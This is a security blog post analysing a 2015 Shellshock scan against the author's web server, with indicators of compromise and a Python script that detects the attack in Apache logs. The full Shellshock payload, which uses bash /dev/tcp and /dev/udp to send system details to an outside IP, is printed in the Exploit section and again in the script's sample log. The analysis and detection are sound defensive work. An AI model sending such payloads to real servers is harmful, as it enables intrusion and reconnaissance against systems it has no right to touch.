Analecta Cyber Company Blog: Possible Compromised Host Scanning for Shellshock

2015-03-23

Possible Compromised Host Scanning for Shellshock

Synopsis

At 2015-03-12T03:00:44 a scan originated from IP address 82.165.157.217 (1&1 Internet AG, associated with domain ONLINEHOME-SERVER.INFO) attempting to exploit the 2014 Shellshock vulnerability (CVE-2014-6271). Had the exploit succeeded, the payload commands would have opened several outbound TCP and UDP connections to a second IP address and sent it the vulnerable URL and the output of uname -a, information likely to be used for further compromise.


Exploit

The remote attacker attempted to access a Common Gateway Interface (CGI) script named "test-cgi" located within the default "cgi-bin" directory on the web server:

GET /cgi-bin/test-cgi

Both the Referer header and the User-Agent header supplied with the request contain the exploit and the "payload", in this case initial scouting code. A CGI handler exports each request header as an environment variable (HTTP_REFERER, HTTP_USER_AGENT) before invoking the script; an unpatched bash parsed the leading "() { :;};" as a function definition and then executed the commands that follow the closing brace.

() { :;}; /bin/bash -c \"
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/62.193.209.133/23;
    /bin/uname -a > /dev/tcp/62.193.209.133/23;
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/62.193.209.133/80
\"
(Formatted for readability.)

The /dev/tcp and /dev/udp paths are not files on disk. When bash sees a redirection to /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT it opens a socket to that host and port, so each line above sends its output to 62.193.209.133 without needing netcat, curl or any other tool on the victim. The first and third commands tell the attacker which URL is vulnerable; the second reports the kernel name, release and architecture.


Origin IP Address

82.165.157.217 
Registered by: 1&1 Internet AG 
Associated domain: ONLINEHOME-SERVER.INFO


Other IP Addresses

The "scouting" code as I've dubbed it here attempts to contact a second IP address: 
62.193.209.133 
Registered by: AMEN Networks, France (RIPE)
Associated domain: None. 

At the time of this report a proxied port scan was used to enumerate the open ports on 62.193.209.133 and their service banners:

FTP - 21
220 ProFTPD 1.3.2e Server (ProFTPD) [62.193.209.133]

SMTP - 25
220 vds-818019.amen-pro.com ESMTP

HTTP - 80
HTTP/1.1 200 OK
Date: Mon, 23 Mar 2015 01:22:23 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 21 Jan 2014 08:24:28 GMT
ETag: "103d80ca-1a4d-4f076bc9c2700"
Accept-Ranges: bytes
Content-Length: 6733
Connection: close
Content-Type: text/html

POP3 - 110
+OK Hello there. <36079.1427073743@localhost.localdomain>

IMAP - 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information.
* BYE Disconnected for inactivity


Indicators of Compromise

  • Connections to or from 82.165.157.217 or 62.193.209.133.
  • Outbound TCP connections to 62.193.209.133 on port 23.
  • Outbound UDP connections to 62.193.209.133 on port 80.
  • HTTP requests for /cgi-bin/test-cgi whose Referer or User-Agent header begins with "() {".
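The indicators above can be hunted for directly in the web server's access log. The following Python script is an added example written for this page, not code from the original post: it parses Apache combined-format lines, flags any request line, Referer or User-Agent header that carries the "() {" Shellshock prefix, and pulls the /dev/tcp and /dev/udp callback targets out of the payload so they can be handed to an egress filter. The log lines it runs over are constructed to match the request described in the Exploit section; the placeholder DOMAIN-REDACTED.COM, the 404 status, the byte counts and the benign source addresses 198.51.100.7 and 203.0.113.9 are assumptions, not data from the incident.

```python
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Apache "combined" LogFormat. Apache writes a literal \" for a double quote
# inside a logged field, so each quoted field is matched as (?:[^"\\]|\\.)*.
_QUOTED = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    + r'"(?P<referer>' + _QUOTED + r')" "(?P<agent>' + _QUOTED + r')"$'
)

# CVE-2014-6271 trigger: a variable value beginning with "() {". An unpatched
# bash parsed that as a function definition and ran whatever followed the brace.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# bash's /dev/tcp/HOST/PORT and /dev/udp/HOST/PORT redirection targets, which
# this scanner's payload uses to send data out without netcat or curl.
CALLBACK_RE = re.compile(r'/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s;]+)/(?P<port>\d{1,5})')

Callback = Tuple[str, str, int]  # (proto, host, port)

# Constructed sample log (not taken from the author's server). Line 1 reproduces
# the request described in the post in combined format; line 2 is benign
# traffic; line 3 is a truncated entry that must not crash the scan.
SAMPLE_LOG = r'''
82.165.157.217 - - [12/Mar/2015:03:00:44 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 295 "() { :;}; /bin/bash -c \"echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/62.193.209.133/23; /bin/uname -a > /dev/tcp/62.193.209.133/23; echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/62.193.209.133/80\"" "() { :;}; /bin/bash -c \"echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/62.193.209.133/23; /bin/uname -a > /dev/tcp/62.193.209.133/23; echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/62.193.209.133/80\""
198.51.100.7 - - [12/Mar/2015:03:01:10 +0000] "GET /index.html HTTP/1.1" 200 6733 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/36.0"
203.0.113.9 - - [12/Mar/2015:03:02:00 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404
'''


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse(record: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding if the request line, Referer or User-Agent carries a Shellshock prefix."""
    hit_fields = [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(record[f])]
    if not hit_fields:
        return None
    payload = " ".join(record[f] for f in hit_fields)
    # Every distinct (proto, host, port) the payload would connect back to.
    callbacks: List[Callback] = sorted({
        (m.group("proto"), m.group("host"), int(m.group("port")))
        for m in CALLBACK_RE.finditer(payload)
    })
    return {
        "src": record["src"],
        "time": record["time"],
        "request": record["request"],
        "fields": hit_fields,
        "callbacks": callbacks,
    }


def scan(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Run analyse() over every parseable line; blank and unparseable lines are skipped."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        if not line.strip():
            continue
        record = parse_combined(line)
        if record is None:
            continue  # a production pipeline would count and review these
        finding = analyse(record)
        if finding:
            findings.append(finding)
    return findings


def egress_iocs(findings: Iterable[Dict[str, object]]) -> Set[Callback]:
    """Collect (proto, host, port) tuples to block or alert on at the egress firewall."""
    return {cb for f in findings for cb in f["callbacks"]}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for f in found:
        print(f"{f['time']} {f['src']} {f['request']} via {','.join(f['fields'])}")
        for proto, host, port in f["callbacks"]:
            print(f"  callback {proto}://{host}:{port}")
    print("egress IoCs:", sorted(egress_iocs(found)))
```

The combined format records only the request line, Referer and User-Agent, but a CGI handler exports every request header (Cookie, Host, Accept and so on) as an HTTP_* variable, so a payload placed in one of those headers would not appear in this log at all. A custom LogFormat that records the extra headers, or inspection at a reverse proxy or IDS, is needed to close that gap.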


Damage Assessment

No damage was sustained by the server from these requests. Had the attack succeeded, the victim should expect follow-up connections once the scanner had confirmed that the server was vulnerable to CVE-2014-6271 (Shellshock). The intruder would hold the privileges of the user the web server runs as. It is likely the attacker would then establish a secondary method of access and/or attempt to escalate to a more privileged account; the kernel release reported by uname -a is exactly the detail needed to choose a local privilege-escalation exploit. Because the attacker collects that information up front rather than merely confirming command execution, we assess this as a slightly more sophisticated methodology than seen with other common "Shellshock" attacks.

Reference:
It is important to note that the registered owners of the IP addresses involved in this attack may themselves be victims of a network incident. In many cases the IP addresses identified from an incident are owned by one person or organization but are under the control of an unauthorized user.